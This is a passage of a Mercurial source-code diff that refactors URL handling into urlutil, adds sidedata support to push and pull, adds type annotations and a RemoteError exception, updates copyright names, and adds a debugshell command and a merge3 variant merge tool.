+ source, branches = urlutil.get_unique_pull_path(
+ b'debugssl', repo, ui, source
+ )
+ url = urlutil.url(source)
defaultport = {b'https': 443, b'ssh': 22}
if url.scheme in defaultport:
@@ -3636,8 +3765,14 @@
for backup in backups:
# Much of this is copied from the hg incoming logic
- source = ui.expandpath(os.path.relpath(backup, encoding.getcwd()))
- source, branches = hg.parseurl(source, opts.get(b"branch"))
+ source = os.path.relpath(backup, encoding.getcwd())
+ source, branches = urlutil.get_unique_pull_path(
+ b'debugbackupbundle',
+ repo,
+ ui,
+ source,
+ default_branches=opts.get(b'branch'),
+ )
try:
other = hg.peer(repo, opts, source)
except error.LookupError as ex:
@@ -3719,6 +3854,23 @@
ui.writenoi18n(b' revision %s\n' % v[1])
+@command(b'debugshell', optionalrepo=True)
+def debugshell(ui, repo):
+ """run an interactive Python interpreter
+
+ The local namespace is provided with a reference to the ui and
+ the repo instance (if available).
+ """
+ import code
+
+ imported_objects = {
+ 'ui': ui,
+ 'repo': repo,
+ }
+
+ code.interact(local=imported_objects)
+
+
@command(
b'debugsuccessorssets',
[(b'', b'closest', False, _(b'return closest successors sets only'))],
@@ -3779,10 +3931,19 @@
def debugtagscache(ui, repo):
"""display the contents of .hg/cache/hgtagsfnodes1"""
cache = tagsmod.hgtagsfnodescache(repo.unfiltered())
+ flog = repo.file(b'.hgtags')
for r in repo:
node = repo[r].node()
tagsnode = cache.getfnode(node, computemissing=False)
- tagsnodedisplay = hex(tagsnode) if tagsnode else b'missing/invalid'
+ if tagsnode:
+ tagsnodedisplay = hex(tagsnode)
+ if not flog.hasnode(tagsnode):
+ tagsnodedisplay += b' (unknown node)'
+ elif tagsnode is None:
+ tagsnodedisplay = b'missing'
+ else:
+ tagsnodedisplay = b'invalid'
+
ui.write(b'%d %s %s\n' % (r, hex(node), tagsnodedisplay))
@@ -4000,19 +4161,22 @@
def debugwireargs(ui, repopath, *vals, **opts):
opts = pycompat.byteskwargs(opts)
repo = hg.peer(ui, opts, repopath)
- for opt in cmdutil.remoteopts:
- del opts[opt[1]]
- args = {}
- for k, v in pycompat.iteritems(opts):
- if v:
- args[k] = v
- args = pycompat.strkwargs(args)
- # run twice to check that we don't mess up the stream for the next command
- res1 = repo.debugwireargs(*vals, **args)
- res2 = repo.debugwireargs(*vals, **args)
- ui.write(b"%s\n" % res1)
- if res1 != res2:
- ui.warn(b"%s\n" % res2)
+ try:
+ for opt in cmdutil.remoteopts:
+ del opts[opt[1]]
+ args = {}
+ for k, v in pycompat.iteritems(opts):
+ if v:
+ args[k] = v
+ args = pycompat.strkwargs(args)
+ # run twice to check that we don't mess up the stream for the next command
+ res1 = repo.debugwireargs(*vals, **args)
+ res2 = repo.debugwireargs(*vals, **args)
+ ui.write(b"%s\n" % res1)
+ if res1 != res2:
+ ui.warn(b"%s\n" % res2)
+ finally:
+ repo.close()
def _parsewirelangblocks(fh):
@@ -4372,7 +4536,7 @@
# We bypass hg.peer() so we can proxy the sockets.
# TODO consider not doing this because we skip
# ``hg.wirepeersetupfuncs`` and potentially other useful functionality.
- u = util.url(path)
+ u = urlutil.url(path)
if u.scheme != b'http':
raise error.Abort(_(b'only http:// paths are currently supported'))
--- a/mercurial/destutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/destutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# destutil.py - Mercurial utility function for command destination
#
-# Copyright Matt Mackall <mpm@selenic.com> and other
+# Copyright Olivia Mackall <olivia@selenic.com> and other
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/diffhelper.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/diffhelper.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# diffhelper.py - helper routines for patch
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/dirstate.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/dirstate.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# dirstate.py - working directory tracking for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -73,13 +73,16 @@
@interfaceutil.implementer(intdirstate.idirstate)
class dirstate(object):
- def __init__(self, opener, ui, root, validate, sparsematchfn):
+ def __init__(
+ self, opener, ui, root, validate, sparsematchfn, nodeconstants
+ ):
"""Create a new dirstate object.
opener is an open()-like callable that can be used to open the
dirstate file; root is the root of the directory tracked by
the dirstate.
"""
+ self._nodeconstants = nodeconstants
self._opener = opener
self._validate = validate
self._root = root
@@ -136,7 +139,9 @@
@propertycache
def _map(self):
"""Return the dirstate contents (see documentation for dirstatemap)."""
- self._map = self._mapcls(self._ui, self._opener, self._root)
+ self._map = self._mapcls(
+ self._ui, self._opener, self._root, self._nodeconstants
+ )
return self._map
@property
@@ -1425,12 +1430,13 @@
denormalized form that they appear as in the dirstate.
"""
- def __init__(self, ui, opener, root):
+ def __init__(self, ui, opener, root, nodeconstants):
self._ui = ui
self._opener = opener
self._root = root
self._filename = b'dirstate'
self._nodelen = 20
+ self._nodeconstants = nodeconstants
self._parents = None
self._dirtyparents = False
@@ -1729,7 +1735,8 @@
if rustmod is not None:
class dirstatemap(object):
- def __init__(self, ui, opener, root):
+ def __init__(self, ui, opener, root, nodeconstants):
+ self._nodeconstants = nodeconstants
self._ui = ui
self._opener = opener
self._root = root
--- a/mercurial/dirstateguard.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/dirstateguard.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# dirstateguard.py - class to allow restoring dirstate after failure
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/discovery.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/discovery.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# discovery.py - protocol changeset discovery functions
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -270,9 +270,12 @@
# C. Update newmap with outgoing changes.
# This will possibly add new heads and remove existing ones.
newmap = branchmap.remotebranchcache(
- (branch, heads[1])
- for branch, heads in pycompat.iteritems(headssum)
- if heads[0] is not None
+ repo,
+ (
+ (branch, heads[1])
+ for branch, heads in pycompat.iteritems(headssum)
+ if heads[0] is not None
+ ),
)
newmap.update(repo, (ctx.rev() for ctx in missingctx))
for branch, newheads in pycompat.iteritems(newmap):
--- a/mercurial/dispatch.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/dispatch.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# dispatch.py - command dispatching for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -50,6 +50,7 @@
from .utils import (
procutil,
stringutil,
+ urlutil,
)
@@ -990,7 +991,7 @@
lui.readconfig(os.path.join(path, b".hg", b"hgrc-not-shared"), path)
if rpath:
- path = lui.expandpath(rpath)
+ path = urlutil.get_clone_path(lui, rpath)[0]
lui = ui.copy()
if rcutil.use_repo_hgrc():
_readsharedsourceconfig(lui, path)
--- a/mercurial/encoding.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/encoding.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# encoding.py - character transcoding support for Mercurial
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/error.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/error.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# error.py - Mercurial exceptions
#
-# Copyright 2005-2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -20,7 +20,13 @@
if pycompat.TYPE_CHECKING:
from typing import (
+ Any,
+ AnyStr,
+ Iterable,
+ List,
Optional,
+ Sequence,
+ Union,
)
@@ -60,6 +66,7 @@
class SidedataHashError(RevlogError):
def __init__(self, key, expected, got):
+ self.hint = None
self.sidedatakey = key
self.expecteddigest = expected
self.actualdigest = got
@@ -77,9 +84,9 @@
# Python 2.6+ complain about the 'message' property being deprecated
self.lookupmessage = message
if isinstance(name, bytes) and len(name) == 20:
- from .node import short
+ from .node import hex
- name = short(name)
+ name = hex(name)
# if name is a binary node, it can be None
RevlogError.__init__(
self, b'%s@%s: %s' % (index, pycompat.bytestr(name), message)
@@ -108,6 +115,7 @@
"""Exception raised on errors in parsing the command line."""
def __init__(self, command, message):
+ # type: (bytes, bytes) -> None
self.command = command
self.message = message
super(CommandError, self).__init__()
@@ -119,6 +127,7 @@
"""Exception raised if command is not in the command table."""
def __init__(self, command, all_commands=None):
+ # type: (bytes, Optional[List[bytes]]) -> None
self.command = command
self.all_commands = all_commands
super(UnknownCommand, self).__init__()
@@ -130,6 +139,7 @@
"""Exception raised if command shortcut matches more than one command."""
def __init__(self, prefix, matches):
+ # type: (bytes, List[bytes]) -> None
self.prefix = prefix
self.matches = matches
super(AmbiguousCommand, self).__init__()
@@ -141,6 +151,7 @@
"""Exception raised when a worker process dies."""
def __init__(self, status_code):
+ # type: (int) -> None
self.status_code = status_code
# Pass status code to superclass just so it becomes part of __bytes__
super(WorkerError, self).__init__(status_code)
@@ -158,6 +169,7 @@
"""Exception raised when a continuable command required merge conflict resolution."""
def __init__(self, opname):
+ # type: (bytes) -> None
from .i18n import _
self.opname = opname
@@ -193,6 +205,7 @@
return pycompat.sysstr(self.__bytes__())
def format(self):
+ # type: () -> bytes
from .i18n import _
message = _(b"abort: %s\n") % self.message
@@ -246,10 +259,12 @@
"""Exception raised when parsing config files"""
def __init__(self, message, location=None, hint=None):
+ # type: (bytes, Optional[bytes], Optional[bytes]) -> None
super(ConfigError, self).__init__(message, hint=hint)
self.location = location
def format(self):
+ # type: () -> bytes
from .i18n import _
if self.location is not None:
@@ -289,20 +304,34 @@
Abort.__init__(self, _(b'response expected'))
-class OutOfBandError(Hint, Exception):
+class RemoteError(Abort):
+ """Exception raised when interacting with a remote repo fails"""
+
+
+class OutOfBandError(RemoteError):
"""Exception raised when a remote repo reports failure"""
- __bytes__ = _tobytes
+ def __init__(self, message=None, hint=None):
+ from .i18n import _
+
+ if message:
+ # Abort.format() adds a trailing newline
+ message = _(b"remote error:\n%s") % message.rstrip(b'\n')
+ else:
+ message = _(b"remote error")
+ super(OutOfBandError, self).__init__(message, hint=hint)
class ParseError(Abort):
"""Raised when parsing config files and {rev,file}sets (msg[, pos])"""
def __init__(self, message, location=None, hint=None):
+ # type: (bytes, Optional[Union[bytes, int]], Optional[bytes]) -> None
super(ParseError, self).__init__(message, hint=hint)
self.location = location
def format(self):
+ # type: () -> bytes
from .i18n import _
if self.location is not None:
@@ -322,6 +351,7 @@
def getsimilar(symbols, value):
+ # type: (Iterable[bytes], bytes) -> List[bytes]
sim = lambda x: difflib.SequenceMatcher(None, value, x).ratio()
# The cutoff for similarity here is pretty arbitrary. It should
# probably be investigated and tweaked.
@@ -329,6 +359,7 @@
def similarity_hint(similar):
+ # type: (List[bytes]) -> Optional[bytes]
from .i18n import _
if len(similar) == 1:
@@ -344,6 +375,7 @@
"""Exception raised when a {rev,file}set references an unknown identifier"""
def __init__(self, function, symbols):
+ # type: (bytes, Iterable[bytes]) -> None
from .i18n import _
similar = getsimilar(symbols, function)
@@ -378,6 +410,7 @@
"""Raised if I/O to stdout or stderr fails"""
def __init__(self, err):
+ # type: (IOError) -> None
IOError.__init__(self, err.errno, err.strerror)
# no __bytes__() because error message is derived from the standard IOError
@@ -385,6 +418,7 @@
class UnsupportedMergeRecords(Abort):
def __init__(self, recordtypes):
+ # type: (Iterable[bytes]) -> None
from .i18n import _
self.recordtypes = sorted(recordtypes)
@@ -403,12 +437,15 @@
"""generic exception for aborting from an encounter with an unknown version"""
def __init__(self, msg, hint=None, version=None):
+ # type: (bytes, Optional[bytes], Optional[bytes]) -> None
self.version = version
super(UnknownVersion, self).__init__(msg, hint=hint)
class LockError(IOError):
def __init__(self, errno, strerror, filename, desc):
+ # TODO: figure out if this should be bytes or str
+ # _type: (int, str, str, bytes) -> None
IOError.__init__(self, errno, strerror, filename)
self.desc = desc
@@ -455,6 +492,7 @@
"""Raised if a mercurial (core or extension) developer made a mistake"""
def __init__(self, msg, *args, **kwargs):
+ # type: (AnyStr, Any, Any) -> None
# On Python 3, turn the message back into a string since this is
# an internal-only error that won't be printed except in a
# stack traces.
@@ -498,7 +536,7 @@
entries.append(b"%s=%r" % (par, pycompat.maybebytestr(val)))
if entries:
msg = b'%s - %s' % (msg, b', '.join(entries))
- ValueError.__init__(self, msg)
+ ValueError.__init__(self, msg) # TODO: convert to str?
class ReadOnlyPartError(RuntimeError):
@@ -532,6 +570,7 @@
"""
def __init__(self, filename, node, tombstone):
+ # type: (bytes, bytes, bytes) -> None
from .node import short
StorageError.__init__(self, b'%s:%s' % (filename, short(node)))
@@ -587,5 +626,6 @@
"""
def __init__(self, message, args=None):
+ # type: (bytes, Optional[Sequence[bytes]]) -> None
self.message = message
self.messageargs = args
--- a/mercurial/exchange.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/exchange.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# exchange.py - utility to exchange data between repos.
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -42,6 +42,7 @@
from .utils import (
hashutil,
stringutil,
+ urlutil,
)
urlerr = util.urlerr
@@ -420,7 +421,20 @@
b'unbundle wire protocol command'
)
)
-
+ for category in sorted(bundle2.read_remote_wanted_sidedata(pushop.remote)):
+ # Check that a computer is registered for that category for at least
+ # one revlog kind.
+ for kind, computers in repo._sidedata_computers.items():
+ if computers.get(category):
+ break
+ else:
+ raise error.Abort(
+ _(
+ b'cannot push: required sidedata category not supported'
+ b" by this client: '%s'"
+ )
+ % pycompat.bytestr(category)
+ )
# get lock as we might write phase data
wlock = lock = None
try:
@@ -814,7 +828,7 @@
data = []
for book, old, new in pushop.outbookmarks:
data.append((book, old))
- checkdata = bookmod.binaryencode(data)
+ checkdata = bookmod.binaryencode(pushop.repo, data)
bundler.newpart(b'check:bookmarks', data=checkdata)
@@ -865,8 +879,15 @@
if not cgversions:
raise error.Abort(_(b'no common changegroup version'))
version = max(cgversions)
+
+ remote_sidedata = bundle2.read_remote_wanted_sidedata(pushop.remote)
cgstream = changegroup.makestream(
- pushop.repo, pushop.outgoing, version, b'push'
+ pushop.repo,
+ pushop.outgoing,
+ version,
+ b'push',
+ bundlecaps=b2caps,
+ remote_sidedata=remote_sidedata,
)
cgpart = bundler.newpart(b'changegroup', data=cgstream)
if cgversions:
@@ -1007,7 +1028,7 @@
_abortonsecretctx(pushop, new, book)
data.append((book, new))
allactions.append((book, _bmaction(old, new)))
- checkdata = bookmod.binaryencode(data)
+ checkdata = bookmod.binaryencode(pushop.repo, data)
bundler.newpart(b'bookmarks', data=checkdata)
def handlereply(op):
@@ -1126,19 +1147,19 @@
},
).result()
except error.BundleValueError as exc:
- raise error.Abort(_(b'missing support for %s') % exc)
+ raise error.RemoteError(_(b'missing support for %s') % exc)
try:
trgetter = None
if pushback:
trgetter = pushop.trmanager.transaction
op = bundle2.processbundle(pushop.repo, reply, trgetter)
except error.BundleValueError as exc:
- raise error.Abort(_(b'missing support for %s') % exc)
+ raise error.RemoteError(_(b'missing support for %s') % exc)
except bundle2.AbortFromPart as exc:
- pushop.ui.status(_(b'remote: %s\n') % exc)
+ pushop.ui.error(_(b'remote: %s\n') % exc)
if exc.hint is not None:
- pushop.ui.status(_(b'remote: %s\n') % (b'(%s)' % exc.hint))
- raise error.Abort(_(b'push failed on remote'))
+ pushop.ui.error(_(b'remote: %s\n') % (b'(%s)' % exc.hint))
+ raise error.RemoteError(_(b'push failed on remote'))
except error.PushkeyFailed as exc:
partid = int(exc.partid)
if partid not in pushop.pkfailcb:
@@ -1445,7 +1466,7 @@
def transaction(self):
"""Return an open transaction object, constructing if necessary"""
if not self._tr:
- trname = b'%s\n%s' % (self.source, util.hidepassword(self.url))
+ trname = b'%s\n%s' % (self.source, urlutil.hidepassword(self.url))
self._tr = self.repo.transaction(trname)
self._tr.hookargs[b'source'] = self.source
self._tr.hookargs[b'url'] = self.url
@@ -1607,6 +1628,23 @@
) % (b', '.join(sorted(missing)))
raise error.Abort(msg)
+ for category in repo._wanted_sidedata:
+ # Check that a computer is registered for that category for at least
+ # one revlog kind.
+ for kind, computers in repo._sidedata_computers.items():
+ if computers.get(category):
+ break
+ else:
+ # This should never happen since repos are supposed to be able to
+ # generate the sidedata they require.
+ raise error.ProgrammingError(
+ _(
+ b'sidedata category requested by local side without local'
+ b"support: '%s'"
+ )
+ % pycompat.bytestr(category)
+ )
+
pullop.trmanager = transactionmanager(repo, b'pull', remote.url())
wlock = util.nullcontextmanager()
if not bookmod.bookmarksinstore(repo):
@@ -1820,6 +1858,10 @@
pullop.stepsdone.add(b'obsmarkers')
_pullbundle2extraprepare(pullop, kwargs)
+ remote_sidedata = bundle2.read_remote_wanted_sidedata(pullop.remote)
+ if remote_sidedata:
+ kwargs[b'remote_sidedata'] = remote_sidedata
+
with pullop.remote.commandexecutor() as e:
args = dict(kwargs)
args[b'source'] = b'pull'
@@ -1832,10 +1874,10 @@
op.modes[b'bookmarks'] = b'records'
bundle2.processbundle(pullop.repo, bundle, op=op)
except bundle2.AbortFromPart as exc:
- pullop.repo.ui.status(_(b'remote: abort: %s\n') % exc)
- raise error.Abort(_(b'pull failed on remote'), hint=exc.hint)
+ pullop.repo.ui.error(_(b'remote: abort: %s\n') % exc)
+ raise error.RemoteError(_(b'pull failed on remote'), hint=exc.hint)
except error.BundleValueError as exc:
- raise error.Abort(_(b'missing support for %s') % exc)
+ raise error.RemoteError(_(b'missing support for %s') % exc)
if pullop.fetch:
pullop.cgresult = bundle2.combinechangegroupresults(op)
@@ -2249,7 +2291,13 @@
def getbundlechunks(
- repo, source, heads=None, common=None, bundlecaps=None, **kwargs
+ repo,
+ source,
+ heads=None,
+ common=None,
+ bundlecaps=None,
+ remote_sidedata=None,
+ **kwargs
):
"""Return chunks constituting a bundle's raw data.
@@ -2279,7 +2327,12 @@
return (
info,
changegroup.makestream(
- repo, outgoing, b'01', source, bundlecaps=bundlecaps
+ repo,
+ outgoing,
+ b'01',
+ source,
+ bundlecaps=bundlecaps,
+ remote_sidedata=remote_sidedata,
),
)
@@ -2303,6 +2356,7 @@
source,
bundlecaps=bundlecaps,
b2caps=b2caps,
+ remote_sidedata=remote_sidedata,
**pycompat.strkwargs(kwargs)
)
@@ -2325,6 +2379,7 @@
b2caps=None,
heads=None,
common=None,
+ remote_sidedata=None,
**kwargs
):
"""add a changegroup part to the requested bundle"""
@@ -2355,7 +2410,13 @@
matcher = None
cgstream = changegroup.makestream(
- repo, outgoing, version, source, bundlecaps=bundlecaps, matcher=matcher
+ repo,
+ outgoing,
+ version,
+ source,
+ bundlecaps=bundlecaps,
+ matcher=matcher,
+ remote_sidedata=remote_sidedata,
)
part = bundler.newpart(b'changegroup', data=cgstream)
@@ -2369,6 +2430,8 @@
if b'exp-sidedata-flag' in repo.requirements:
part.addparam(b'exp-sidedata', b'1')
+ sidedata = bundle2.format_remote_wanted_sidedata(repo)
+ part.addparam(b'exp-wanted-sidedata', sidedata)
if (
kwargs.get('narrow', False)
@@ -2393,7 +2456,7 @@
if not b2caps or b'bookmarks' not in b2caps:
raise error.Abort(_(b'no common bookmarks exchange method'))
books = bookmod.listbinbookmarks(repo)
- data = bookmod.binaryencode(books)
+ data = bookmod.binaryencode(repo, books)
if data:
bundler.newpart(b'bookmarks', data=data)
@@ -2585,7 +2648,7 @@
# push can proceed
if not isinstance(cg, bundle2.unbundle20):
# legacy case: bundle1 (changegroup 01)
- txnname = b"\n".join([source, util.hidepassword(url)])
+ txnname = b"\n".join([source, urlutil.hidepassword(url)])
with repo.lock(), repo.transaction(txnname) as tr:
op = bundle2.applybundle(repo, cg, tr, source, url)
r = bundle2.combinechangegroupresults(op)
--- a/mercurial/exchangev2.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/exchangev2.py Tue Apr 20 11:01:06 2021 -0400
@@ -22,6 +22,7 @@
narrowspec,
phases,
pycompat,
+ requirements as requirementsmod,
setdiscovery,
)
from .interfaces import repository
@@ -183,7 +184,7 @@
# TODO This is super hacky. There needs to be a storage API for this. We
# also need to check for compatibility with the remote.
- if b'revlogv1' not in repo.requirements:
+ if requirementsmod.REVLOGV1_REQUIREMENT not in repo.requirements:
return False
return True
@@ -358,18 +359,20 @@
# Linkrev for changelog is always self.
return len(cl)
- def ondupchangeset(cl, node):
- added.append(node)
+ def ondupchangeset(cl, rev):
+ added.append(cl.node(rev))
- def onchangeset(cl, node):
+ def onchangeset(cl, rev):
progress.increment()
- revision = cl.changelogrevision(node)
- added.append(node)
+ revision = cl.changelogrevision(rev)
+ added.append(cl.node(rev))
# We need to preserve the mapping of changelog revision to node
# so we can set the linkrev accordingly when manifests are added.
- manifestnodes[cl.rev(node)] = revision.manifest
+ manifestnodes[rev] = revision.manifest
+
+ repo.register_changeset(rev, revision)
nodesbyphase = {phase: set() for phase in phases.phasenames.values()}
remotebookmarks = {}
@@ -414,12 +417,15 @@
mdiff.trivialdiffheader(len(data)) + data,
# Flags not yet supported.
0,
+ # Sidedata not yet supported
+ {},
)
cl.addgroup(
iterrevisions(),
linkrev,
weakref.proxy(tr),
+ alwayscache=True,
addrevisioncb=onchangeset,
duplicaterevisioncb=ondupchangeset,
)
@@ -492,6 +498,8 @@
delta,
# Flags not yet supported.
0,
+ # Sidedata not yet supported.
+ {},
)
progress.increment()
@@ -533,8 +541,8 @@
# Chomp off header object.
next(objs)
- def onchangeset(cl, node):
- added.append(node)
+ def onchangeset(cl, rev):
+ added.append(cl.node(rev))
rootmanifest.addgroup(
iterrevisions(objs, progress),
@@ -617,6 +625,8 @@
delta,
# Flags not yet supported.
0,
+ # Sidedata not yet supported.
+ {},
)
progress.increment()
@@ -715,6 +725,8 @@
delta,
# Flags not yet supported.
0,
+ # Sidedata not yet supported.
+ {},
)
progress.increment()
--- a/mercurial/extensions.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/extensions.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# extensions.py - extension handling for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/exthelper.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/exthelper.py Tue Apr 20 11:01:06 2021 -0400
@@ -46,13 +46,22 @@
# ext.py
eh = exthelper.exthelper()
- # As needed:
+ # As needed (failure to do this will mean your registration will not
+ # happen):
cmdtable = eh.cmdtable
configtable = eh.configtable
filesetpredicate = eh.filesetpredicate
revsetpredicate = eh.revsetpredicate
templatekeyword = eh.templatekeyword
+ # As needed (failure to do this will mean your eh.wrap*-decorated
+ # functions will not wrap, and/or your eh.*setup-decorated functions
+ # will not execute):
+ uisetup = eh.finaluisetup
+ extsetup = eh.finalextsetup
+ reposetup = eh.finalreposetup
+ uipopulate = eh.finaluipopulate
+
@eh.command(b'mynewcommand',
[(b'r', b'rev', [], _(b'operate on these revisions'))],
_(b'-r REV...'),
@@ -155,7 +164,7 @@
c(ui)
def finalextsetup(self, ui):
- """Method to be used as a the extension extsetup
+ """Method to be used as the extension extsetup
The following operations belong here:
@@ -201,6 +210,9 @@
example::
+ # Required, otherwise your uisetup function(s) will not execute.
+ uisetup = eh.finaluisetup
+
@eh.uisetup
def setupbabar(ui):
print('this is uisetup!')
@@ -213,6 +225,9 @@
example::
+ # Required, otherwise your uipopulate function(s) will not execute.
+ uipopulate = eh.finaluipopulate
+
@eh.uipopulate
def setupfoo(ui):
print('this is uipopulate!')
@@ -225,6 +240,9 @@
example::
+ # Required, otherwise your extsetup function(s) will not execute.
+ extsetup = eh.finalextsetup
+
@eh.extsetup
def setupcelestine(ui):
print('this is extsetup!')
@@ -237,6 +255,9 @@
example::
+ # Required, otherwise your reposetup function(s) will not execute.
+ reposetup = eh.finalreposetup
+
@eh.reposetup
def setupzephir(ui, repo):
print('this is reposetup!')
@@ -258,6 +279,11 @@
example::
+ # Required if `extension` is not provided
+ uisetup = eh.finaluisetup
+ # Required if `extension` is provided
+ extsetup = eh.finalextsetup
+
@eh.wrapcommand(b'summary')
def wrapsummary(orig, ui, repo, *args, **kwargs):
ui.note(b'Barry!')
@@ -298,8 +324,11 @@
example::
- @eh.function(discovery, b'checkheads')
- def wrapfunction(orig, *args, **kwargs):
+ # Required, otherwise the function will not be wrapped
+ uisetup = eh.finaluisetup
+
+ @eh.wrapfunction(discovery, b'checkheads')
+ def wrapcheckheads(orig, *args, **kwargs):
ui.note(b'His head smashed in and his heart cut out')
return orig(*args, **kwargs)
"""
--- a/mercurial/fancyopts.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/fancyopts.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# fancyopts.py - better command line parsing
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/filelog.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/filelog.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# filelog.py - file history class for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -32,6 +32,8 @@
# Full name of the user visible file, relative to the repository root.
# Used by LFS.
self._revlog.filename = path
+ self._revlog.revlog_kind = b'filelog'
+ self.nullid = self._revlog.nullid
def __len__(self):
return len(self._revlog)
@@ -102,6 +104,7 @@
revisiondata=False,
assumehaveparentrevisions=False,
deltamode=repository.CG_DELTAMODE_STD,
+ sidedata_helpers=None,
):
return self._revlog.emitrevisions(
nodes,
@@ -109,6 +112,7 @@
revisiondata=revisiondata,
assumehaveparentrevisions=assumehaveparentrevisions,
deltamode=deltamode,
+ sidedata_helpers=sidedata_helpers,
)
def addrevision(
@@ -176,7 +180,8 @@
def add(self, text, meta, transaction, link, p1=None, p2=None):
if meta or text.startswith(b'\1\n'):
text = storageutil.packmeta(meta, text)
- return self.addrevision(text, transaction, link, p1, p2)
+ rev = self.addrevision(text, transaction, link, p1, p2)
+ return self.node(rev)
def renamed(self, node):
return storageutil.filerevisioncopied(self, node)
--- a/mercurial/filemerge.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/filemerge.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# filemerge.py - file-level merge handling for Mercurial
#
-# Copyright 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -538,6 +538,25 @@
@internaltool(
+ b'merge3-lie-about-conflicts',
+ fullmerge,
+ b'',
+ precheck=_mergecheck,
+)
+def _imerge3alwaysgood(*args, **kwargs):
+ # Like merge3, but record conflicts as resolved with markers in place.
+ #
+ # This is used for `diff.merge` to show the differences between
+ # the auto-merge state and the committed merge state. It may be
+ # useful for other things.
+ b1, junk, b2 = _imerge3(*args, **kwargs)
+ # TODO is this right? I'm not sure what these return values mean,
+ # but as far as I can tell this will indicate to callers tha the
+ # merge succeeded.
+ return b1, False, b2
+
+
+@internaltool(
b'mergediff',
fullmerge,
_(
@@ -1195,7 +1214,11 @@
def hasconflictmarkers(data):
return bool(
- re.search(b"^(<<<<<<< .*|=======|>>>>>>> .*)$", data, re.MULTILINE)
+ re.search(
+ br"^(<<<<<<<.*|=======.*|------- .*|\+\+\+\+\+\+\+ .*|>>>>>>>.*)$",
+ data,
+ re.MULTILINE,
+ )
)
--- a/mercurial/fileset.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/fileset.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# fileset.py - file set queries for mercurial
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/filesetlang.py Thu Mar 25 19:06:28 2021 -0400
